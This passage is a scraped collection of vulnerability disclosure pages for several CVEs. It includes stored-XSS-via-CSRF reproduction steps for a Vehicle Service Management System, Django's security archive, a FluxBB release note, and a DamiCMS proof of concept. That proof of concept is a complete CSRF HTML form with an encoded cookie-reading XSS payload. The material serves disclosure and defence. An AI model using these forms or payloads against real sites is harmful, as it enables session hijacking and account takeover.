10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Service List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**5\. Vehicle Service Management System - 'User List' (/admin/?page=user/list)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the User List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in First Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the User List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**6\. Vehicle Service Management System - 'Settings' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Settings section.
6.  Inject the payload "><script>alert(document.cookie)</script> in System Name input field.
7.  Click on Update button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Settings section in Browser B (Firefox).
12.  Malicious javascript code triggered.

CVE-2021-46080: GitHub - plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS: Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Store

BeyondTrust Secure Remote Access Base Software through 6.0.1 allows an attacker to achieve full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. This cross-site-scripting (XSS) vulnerability occurs when it does not properly sanitize an unauthenticated crafted web request to the server

CVE-2021-31589

Storage.save in Django 2.2 before 2.2.26, 3.2 before 3.2.11, and 4.0 before 4.0.1 allows directory traversal if crafted filenames are directly passed to it.

Django’s development team is strongly committed to responsible reporting and disclosure of security-related issues, as outlined in Django’s security policies.

As part of that commitment, we maintain the following historical list of issues which have been fixed and disclosed. For each issue, the list below includes the date, a brief description, the CVE identifier if applicable, a list of affected versions, a link to the full disclosure and links to the appropriate patch(es).

**Issues under Django’s security process¶**

All security issues have been handled under versions of Django’s security process. These are listed below.

**June 2, 2021 - CVE-2021-33571¶**

Possible indeterminate SSRF, RFI, and LFI attacks since validators accepted leading zeros in IPv4 addresses. Full description

**February 1, 2016 - CVE-2016-2048¶**

User with “change” but not “add” permission can create objects for `ModelAdmin`’s with `save_as=True`. Full description

**Versions affected¶**

*   Django 1.9 (patch)

**February 19, 2013 - No CVE¶**

Additional hardening of `Host` header handling. Full description

**December 10, 2012 - No CVE 2¶**

Additional hardening of redirect validation. Full description

**December 10, 2012 - No CVE 1¶**

Additional hardening of `Host` header handling. Full description

**September 9, 2011 - CVE-2011-4140¶**

Potential CSRF via `Host` header. Full description

**Versions affected¶**

This notification was an advisory only, so no patches were issued.

*   Django 1.2
*   Django 1.3

**Issues prior to Django’s security process¶**

Some security issues were handled before Django had a formalized security process in use. For these, new releases may not have been issued at the time and CVEs may not have been assigned.

CVE-2021-45452: Archive of security issues | Django documentation

Fluxbb v1.4.12 is affected by a Cross Site Scripting (XSS) vulnerability.

**FluxBB is fast, light, user-friendly forum software for your website.**

FluxBB is designed as a lighter, faster alternative to some of the traditional feature heavy forum applications. It is easy to use and has a proven track record of stability and security making it an ideal choice of forum for your website.

**Features**

*   Supports PHP5 & PHP7
*   Easy installation and setup
*   Open-source (GNU General Public Licence)
*   Clean administration interface
*   Flexible permission system
*   Lots of community modifications

\[ Full feature list \] \[ Tour of FluxBB v1.5.11 \]

**Get FluxBB**

The current stable release is FluxBB v1.5.11.

**Posted 2018-12-31FluxBB 1.5.11 released**

I am glad to finally announce the next patch release of FluxBB: **version 1.5.11**.

**Feature updates**

*   Increase minimum password length
    
*   Prohibit links in topic subjects (based on existing anti-spam permission)
    
*   Allow longer SMTP passwords
    
*   Return correct HTTP status code on error and maintenance pages (to prevent search engines from indexing)
    
*   Prevent duplicate bans
    
*   User profiles: Use user's date/time formats, not the viewer's
    
*   Improve error message for very short searches
    

Please check out the details in the full changelog. In addition, this release fixes nine bugs, some of which affect...

**Security**

*   Proper CSRF protection for rebuilding the search index, logging in and promoting users
    
*   Stop using insecure random number generator on certain PHP versions
    
*   Fix insufficient escaping of HTML output in installer and error pages
    

This release has benefited from contributions by jasonrohrer, nsuchy and Visman. Thank you!

I also want to thank TheBritain, Visman, Li of SEC Consult Vulnerability Lab and Omar Kurt of Netsparker for respectfully and responsibly disclosing security-relevant issues.

  
**Project update**

As you know, this is the first release in a long time. I have decided to continue giving FluxBB the maintenance it deserves. However, I need support to achieve this. Before I announce all of my plans, as a token of goodwill and to regain some trust, I plan to release the long-awaited v1.6 within the next few weeks. This release will clean up some of the dusty bits under the hood of FluxBB. By removing support for old PHP and browser versions, we can lay the foundations to carefully modernize the codebase, while staying true to the spirit of FluxBB. **This means that 1.5.11 is the last release to support PHP 4** (which is horribly outdated). In addition, 1.6 will get some much-needed love in the realm of security hardening.

With that out of the way: please go ahead and download the new version on the downloads page. If you are upgrading an existing forum, you can find instructions and resources on the upgrade page.

**Enjoy using FluxBB and stay tuned for more news on v1.6!**

**Latest announcements**

CVE-2021-43677: FluxBB 1.5.11 released

iBall WRD12EN 1.0.0 devices allow cross-site request forgery (CSRF) attacks as demonstrated by enabling DNS settings or modifying the range for IP addresses.

**Latest commit**

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

CVE-2020-29292: GitHub - Nitya91/iBall-WRD12EN-1.0.0

A vulnerability in /damicms-master/admin.php?s=/Article/doedit of DamiCMS v6.0 allows attackers to compromise and impersonate user accounts via obtaining a user's session cookie.

Permalink

Cannot retrieve contributors at this time

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.

After the administrator login in,open the poc poc：

      
      <body>
        <form action="http://172.16.100.28/damicms-master/admin.php?s=/Article/doedit" method="POST">
          <input type="hidden" name="title" value="æµ&#139;è&#175;&#149;äº&#167;å&#147;&#129;&lt;img&#32;src&#61;&quot;x&quot;&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&#32;&gt;" />
          <input type="hidden" name="TitleFontColor" value="" />
          <input type="hidden" name="keywords" value="" />
          <input type="hidden" name="description" value="å&#158;&#139;å&#143;&#183;&#58;&#32;ä&#187;&#183;æ&#160;&#188;ï&#188;&#154;é&#157;&#162;è&#174;&#174;&#32;é&#162;&#156;è&#137;&#178;&#58;" />
          <input type="hidden" name="hits" value="69" />
          <input type="hidden" name="typeid" value="24" />
          <input type="hidden" name="imgurl" value="&#47;Public&#47;Uploads&#47;thumb&#47;thumb&#95;1393207060&#46;jpg" />
          <input type="hidden" name="isimg" value="1" />
          <input type="hidden" name="content" value="androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;" />
          <input type="hidden" name="price" value="4000" />
          <input type="hidden" name="color" value="ç&#129;&#176;è&#137;&#178;" />
          <input type="hidden" name="product&#95;xinghao" value="M002457J" />
          <input type="hidden" name="submit" value="ä&#191;&#174;æ&#148;&#185;" />
          <input type="hidden" name="aid" value="66" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

damicms-master/admin.php?s=/Index/index Successfully inserted ![](https://github.com/wind-cyber/DamiCMS-v6.0.0-have-csrf-and-xss-Vulnerabilities-/raw/master/x)

![描述](https://github.com/wind-cyber/DamiCMS-v6.0.0-have-csrf-and-xss-Vulnerabilities-/raw/master/rpng/ZS4DTJV2YV%5DB6QRAEP0%25FH8.png)

Tag

#csrf